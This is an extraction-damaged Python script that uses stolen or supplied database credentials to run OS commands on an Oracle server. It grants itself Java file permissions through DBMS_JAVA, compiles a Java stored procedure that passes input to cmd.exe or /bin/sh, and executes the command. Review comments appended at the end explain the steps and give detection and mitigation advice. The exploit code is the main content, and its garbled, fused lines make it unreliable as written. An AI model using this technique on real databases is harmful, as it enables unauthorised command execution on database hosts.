#!/usr/bin/Env python#-*-coding:utf-8-*-# file:ora_exec_cmd.py# Author:persuitimport getoptimport sysimport cx_oracledef usage (): Print ('Usage:python%s [options]'% sys.argv[0]) print ("') Print ('Options:') Print ('-H HOST,--host=host target server address') Print ('-u USER,--user=user Username') Print ('-P PASS,--pass=pass Password') Print ('-S SID,--sid=sid Target SID Name') Print ('-P Port,--port=port Oracle Port') #print ('-B BYPASS,--bypass=bypass BYPASS Creation of Evil Functions') Print ('-C command,--command=command command') def connectdb (host="', user ="', passwd ="', sid ="', Port =1521): Try: ConnStr='%s/%[email protected]%s:%d/%s'% (User,passwd,host,int(port), SID) Conn=Cx_oracle.connect (connstr) except Cx_oracle.databaseerror ase:print str (e) sys.exit (-1) returnConndef Main ():Try: opts, args= Getopt.getopt (sys.argv[1:],'H:u:p:s:p:c:', ['host=','user=','passwd=','sid=','port=','command=']) except getopt. Getopterror asE:print ('[-]%s'%(str (e))) usage () Sys.exit (2) Host="'User="'passwd="'Sid="'Port=1521Command="' forO, ainchopts:ifOinch('- H','--host'): Host=a elif oinch('- u','--user'): User=a elif oinch('- P','--passwd'): passwd=a elif oinch('- S','--sid'): Sid=a elif oinch('- P','--port'): Port=a elif oinch('- C','--command'): Command=aElse: PassifNot Host:print ('[!] Host not being empty!') usage () Sys.exit (2) Elif not User:print ('[!] username not be empty!') usage () Sys.exit (2) Elif not Passwd:print ('[!] Password not be empty!') usage () Sys.exit (2) Elif not Sid:print ('[!] SID not being empty!') usage () Sys.exit (2) Elif not Command:print ('[!] 
command not being empty!') usage () Sys.exit (2) #conn= Connectdb ('127.0.0.1','Oracle','123456','SDFSDF','dbtest',1521) Conn=Connectdb (host,user,passwd,sid,port) cursor=conn.cursor () print ("[-] Setting permissions...\n") SetPermission=" "BEGINDbms_java.grant_permission ('{0}','java.io.FilePermission','<<all files>>','read, write, execute, delete'); Dbms_java.grant_permission ('{0}','SYS:java.lang.RuntimePermission','Writefiledescriptor',"'); Dbms_java.grant_permission ('{0}','SYS:java.lang.RuntimePermission','Readfiledescriptor',"'); END;" ". Format (User.upper ())Cursor.execute (setpermission) #conn. Commit () print ("[-] Creating Java class...\n") Createjava=" "Create or replace and compile Java source named "Linxutil" as import java.io.*; public class Linxutil extends Object {public static string Run_cmd (String args) {try {string[] fcmd;if (system.getproperty ("Os.name"). toLowerCase (). IndexOf ("windows")! =-1) {fcmd = new string[3];fcmd[0] = "c:\\\\windows\\\\system32\\\\ Cmd.exe "; fcmd[1] ="/C "; fcmd[2] = command;} else {fcmd = new string[3];fcmd[0] = "/bin/sh"; fcmd[1] = "-C"; fcmd[2] = command;} Final Process PR = runtime.getruntime (). EXEC (Fcmd);p r.waitfor (); New Thread (New Runnable () {public void run () { BufferedReader br_in = null;try {br_in = new BufferedReader (New InputStreamReader (Pr.getinputstream ())); String buff = null;while ((buff = Br_in.readline ()) = null) {System.out.println (buff); try {thread.sleep);} catch (Exc Eption e) {}}br_in.close ();} catch (IOException IoE) {System.out.println ("Exception caught printing process output."); Ioe.printstacktrace ();} Finally {try {br_in.close ();} catch (Exception ex) {}}}}). 
Start (); New Thread (NewRunnable () {public void run () {BufferedReader Br_err = null;try {br_err = new BufferedReader (New InputStreamReader (pr.gete Rrorstream ())); String buff = null;while ((buff = Br_err.readline ()) = null) {System.out.println ("Error:" + buff); try {thread.sleep (100) ; } catch (Exception e) {}}br_err.close ();} catch (IOException IoE) {System.out.println ("Exception caught printing process error."); Ioe.printstacktrace ();} Finally {try {br_err.close ();} catch (Exception ex) {}}}}). Start (); catch (Exception ex) {System.out.println (Ex.getlocalizedmessage ());}}};" "cursor.execute (Createjava) print ("[-] Creating function...\n") Creatfunc=" "Create or Replace function Run_cmd (p_cmd in VARCHAR2) return number as language Java name'Util.runthis (java.lang.String)returnInteger';" "cursor.execute (creatfunc) print ("[-] Creating procedure...\n") Creatproc=" "Create or Replace procedure RC (P_cmd in VARCHAR2) as x number; begin x: = Run_cmd (p_cmd); end;" "cursor.execute (creatproc) print ("[-] Exec cmd ... \ n") cmd=" "DECLAREL_output Dbms_output.chararr; L_lines INTEGER:= +; Begin Dbms_output.enable (1000000); Dbms_java. Set_output (1000000); RC ('{0}'); Dbms_output.get_lines (L_output, l_lines); For I in1.. l_lines LOOP Dbms_output.put_line (L_output (i)); NULL; END LOOP; End;" ". Format (command)cursor.execute (cmd) print ("[-] Drop function...\n") Dropfunc=" "BEGINdrop function Run_cmd; END;" "Cursor.execute (Dropfunc) cursor.close () conn.close ()if__name__ = ='__main__': Main ()
# NOTE(review): the listing above is an extraction-damaged copy. Statements are
# fused onto three physical lines, identifiers are re-cased and string quotes
# are altered, so it is not valid Python as shown. The notes below describe only
# what the visible text does.
#
# Sequence visible in the listing:
#   1. Parse host, user, password, SID, port and command from the command line
#      and connect through cx_Oracle with those credentials.
#   2. Call DBMS_JAVA.GRANT_PERMISSION for the upper-cased connecting user:
#      java.io.FilePermission on '<<all files>>' with read/write/execute/delete,
#      plus two java.lang.RuntimePermission grants (file descriptor read/write).
#   3. Compile a Java source named "Linxutil" that passes a string to cmd.exe
#      or /bin/sh, and wrap it in a function Run_cmd and a procedure RC.
#   4. Run the supplied command through RC and collect output via DBMS_OUTPUT.
#   5. Issue a drop for the function Run_cmd only, then close the connection.
#
# Precondition: valid database credentials are required. The account presumably
# also needs rights to make the DBMS_JAVA grants and to create Java sources and
# procedures (e.g. JAVA_ADMIN / CREATE PROCEDURE); confirm against the
# database's privilege model.
#
# Detection and forensics:
#   - Audit DBMS_JAVA.GRANT_PERMISSION calls, in particular a FilePermission on
#     '<<all files>>' that includes 'execute'; DBA_JAVA_POLICY lists such grants.
#   - Alert on CREATE JAVA SOURCE and on functions declared "language Java"
#     created outside change control; look for objects named LINXUTIL, RUN_CMD
#     and RC in DBA_OBJECTS.
#   - The only cleanup the listing attempts is dropping the function, so the
#     Java source, the procedure RC and the permission grants are left behind.
#   - On the host, cmd.exe or /bin/sh started as a child of the Oracle server
#     process is a strong signal.
#
# Mitigation: keep JAVA_ADMIN / JAVASYSPRIV and CREATE PROCEDURE away from
# application accounts, remove the database JVM component where it is unused,
# and restrict listener access to known clients.
Script that executes OS commands on an Oracle server by creating a Java stored procedure